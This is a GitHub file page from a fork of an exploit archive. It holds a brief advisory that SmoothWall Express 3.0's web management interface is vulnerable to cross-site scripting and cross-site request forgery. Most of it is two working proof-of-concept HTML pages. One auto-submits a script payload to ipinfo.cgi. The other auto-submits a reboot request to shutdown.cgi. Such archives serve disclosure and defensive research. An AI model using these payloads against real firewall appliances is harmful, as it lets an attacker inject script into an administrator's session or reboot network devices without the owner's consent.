forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path16006.html
More file actions
executable file
·28 lines (23 loc) · 807 Bytes
/
Copy path16006.html
File metadata and controls
executable file
·28 lines (23 loc) · 807 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.
xss example:
<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
<input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
<input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>
csrf example:
<html>
<title> SmoothWall Express 3.0 csrf </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
<input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>